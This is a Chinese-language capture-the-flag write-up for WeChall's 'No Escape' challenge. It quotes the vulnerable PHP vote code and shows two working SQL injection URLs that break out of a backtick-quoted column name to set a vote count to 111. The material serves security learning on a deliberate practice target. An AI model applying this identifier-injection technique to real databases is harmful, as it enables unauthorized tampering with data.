[WeChall] No Escape (Exploit, PHP, MySQL)
问题
目标:将任意一个人的投票数改成111.
点击Vote for 某某
就会增加1投票数,但是不能靠慢慢点的方法来解决这题目。
因为93-109行定义了一个函数,在点到100的时候,它会重置。
function noesc_stop100()
{
$votes = noesc_getVotes();
foreach ($votes as $who => $count)
{
if ($count == 111) {
noesc_solved();
noesc_resetVotes();
break;
}
if ($count >= 100) {
noesc_resetVotes();
break;
}
}
}
解决
查看投票成功的实现代码:
function noesc_voteup($who)
{
if ( (stripos($who, 'id') !== false) || (strpos($who, '/') !== false) ) {
echo GWF_HTML::error('No Escape', 'Please do not mess with the id. It would break the challenge for others', false);
return;
}
$db = noesc_db();
$who = mysql_real_escape_string($who);
$query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
if (false !== $db->queryWrite($query)) {
echo GWF_HTML::message('No Escape', 'Vote counted for '.GWF_HTML::display($who), false);
}
noesc_stop100();
}
给投票数加1的代码是:
$query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
因此有两种方法,不过都是通过注释来丢弃后面的语句
访问地址
http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111--%20
或
http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111%23
即可成功解题。